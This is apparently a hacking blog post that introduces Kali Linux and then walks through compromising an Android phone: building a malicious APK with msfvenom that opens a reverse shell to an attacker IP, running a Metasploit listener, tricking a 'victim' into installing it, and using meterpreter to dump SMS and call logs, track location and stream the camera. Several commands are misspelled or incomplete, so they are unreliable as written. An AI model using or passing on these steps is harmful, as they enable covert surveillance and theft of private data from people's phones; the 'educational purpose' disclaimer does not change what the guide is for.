Bytes: Kali Linux, a Linux Distribution, which is more of a branch of Debian, but with several specialties. If you have heard of BackTrack, then Kali should be introduced to you more as an updated version of the former. “From the creators of BackTrack comes Kali Linux, the most advanced and versatile penetration testing distribution ever created” that is how Offensive Security Ltd. defines their project.
Kali Linux is an operating system specially designed for penetration testing and security auditing. It is an open source software, stuffed with numerous penetration testing tools, discussing and naming all of which is next to impossible, as it has over 300 of them. This blog puts forward my efforts to introduce the readers to the basics of Kali, which will help them get a head start with this OS. Besides the basic utility tools and applications present in every OS distribution, Kali is preinstalled with the best programs and security tools like Hydra (login cracker), Nmap (port analyzer), Wireshark (data packet analyzer), John the Ripper (password cracking tool) and Metasploit Framework (exploit code developing tool), and other tools.
Metasploit is one of my favorite security tools. What some don’t know is that Metasploit has added some functionality for security testing Android Devices.
In this post we will show you how to get a remote shell on an Android by using Metasploit in Kali Linux.
How To Hack Android Via Kali Linux Using Metasploit?
We will do this by creating a “malicious” Android program file, an APK file, so that once it is run, it will connect out to our attacking machine running Metasploit. We will set Metasploit up to listen for the incoming connection and once it sees it, create a fully functional remote shell to the device. Hacking into android phone may sound difficult but we at HackingSaga provide you the best hacking guides & stuff. Today we are gonna teach you how to hack an android device via Kali Linux. Android is world’s biggest mobile operating system most probably because it’s open source & built on top on Linux kernel.
Warning: This hack is to aware you & only for educational purpose. Please don’t try to do any illegal activity. HackingSaga is not responsible for how you implement this hack.
1: Kali Linux ( Connected to the internet )
2: Android Device
3: Brain ( Obviously :p )
Note: In this tutorial I am using an Acer E-575-G laptop as attacker PC in which I have booted Kali Linux via a pen drive & Xiaomi Redmi Note 4 as victims Android phone.
#1: Boot Into Kali Linux
#2: Fire up Kali Terminal
*We are going to use “MSFVENOM” to create a malicious android apk that will be installed on the victims device.
#3: Type the following command in the terminal
msfvenon –p android/metrepreter/reverse_tcp LHOST=192.168.64.42 R >/root/hackingsaga.apk
Change the LHOST as your own Kali Linux IP IP
*Now you will have a hackingsaga.apk in your root folder.
#4: Open new Terminal window & type “msfconsole”
#5: After metasploit console is ready type the following commands
set payload android/metrepreter/reverse_tcp
set lhost 192.168.64.42
- Send the file to the victim
- Victim installs the file & as soon as he/she hits the open button you will get a interpreter session
#6: In the meterpreter session you can use multiple commans to access private information on the android phone..https://hackingsaga.com/wp-content/uploads/2017/06/android2Bhack2B4.png
Activity_start : Start an android activity
Check_root : Check is device is rooted
Dump_calllog : Download & check call log
Dump_sms : Download & check sms log
Getlocate : get current longitude & latitude using geo location
Send_sms : send sms
Set_audio_mode : set ringer mode
Sqlite_query : sqlite query from a database
Wlan_geolocate : current lon-lat via WLAN info shows on the goole maps.
Webcam_list : provides you the list of webcams
Webcam_snap 2 : selects front camera
Webcam_stream : starts live stream from the front camera
1) Apk File made from msfvenom is 0 kb
That means you have some spelling or syntax error. Please recheck the command you entered, if its correct, recheck again!!
2) In Phone – Cannot Parse Package
Try Another File Manager, Download a free one from google store!!
3) In Phone – App Not Installed
You May Need to Sign Your APK file, newer android versions may give error. Refer to this site, and go to last to see steps on manually signing. LINK HERE
4) Kali as Virtual Machine
Virtual Box is known to cause problems, so use VMWare if possible. Also Please DONT USE NAT MODE, USE BRIDGED!!
If There’s Any other problem, type in the comment!! I’ll try my best to help!!